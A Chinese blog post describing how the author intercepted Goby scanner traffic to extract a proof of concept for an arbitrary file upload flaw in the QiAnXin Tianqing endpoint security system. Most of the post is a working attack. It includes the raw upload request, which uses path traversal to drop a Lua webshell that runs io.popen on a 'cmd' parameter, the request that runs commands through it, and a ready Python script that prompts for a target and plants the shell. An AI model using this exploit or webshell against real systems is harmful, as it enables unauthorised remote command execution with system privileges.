0%

抓包Goby获取漏洞POC

0x01 背景

Goby是一款网络安全测试工具,不得不说是真的好用。时隔半年多,再次使用Goby进行了第二次部门总资产扫描,在扫描过程中发现了数十个漏洞。

发现其中有一个严重漏洞(QiAnXin Tianqing terminal security management system client_upload_file.json getshell)天擎终端安全管理系统任意文件上传。在Google、必应、百度上都没有漏洞详情,只知道该漏洞是今年hvv时期爆出来的。直接用Goby验证如下

好家伙,直接system权限。由于无法从网上获取POC,于是萌生抓取Goby数据包来获取漏洞POC的想法。

0x02 工具准备

所需工具:burpsuite、proxifier

安装详情:略

0x03 POC获取

打开proxifier,添加代理Proxies:

添加规则rules:(应用名称为goby-cmd,选10.100.10.57:80为目标)

打开bp,等待抓包。

最后打开goby漏洞验证页面,点击验证按钮,从bp中获取数据包如下:

上传后,命令执行url如下

使用浏览器打开,cmd后接任意命令:

最终整理请求包如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#数据包1
POST /api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/xxxx.LUAC HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ
Cookie: SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Connection: close

------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx

if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end
------WebKitFormBoundaryLx7ATxHThfk91oxQ--
1
2
3
4
5
6
#数据包2
GET /api/xxxx.json?cmd=whoami HTTP/1.1
Host: 10.100.10.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

编写python POC脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import os
import requests
import random
import string

# 定义webshell
shell = '''if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end
'''

# 定义4位随机数
random_str = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(4))

# 输入目标
url = input("input the TARGET(example:[url]https://127.0.0.1:1080[/url])\nurl >>>")
# 定义上传目录
upload_url = url+"/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/"+random_str+".LUAC"

headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15"}
files = {'file': shell}

# 上传
upload_res = requests.post(upload_url,headers=headers,files=files)

# 执行命令
cmd_url = url+'/api/'+random_str+'.json'
params = {"cmd":"whoami"}
res = requests.get(url=cmd_url,headers=headers,params=params)
s = res.status_code

if s==200:
print('shell is here:'+cmd_url+'?cmd=command')
else:
print('不存在漏洞')
-------本文结束  感谢您的阅读-------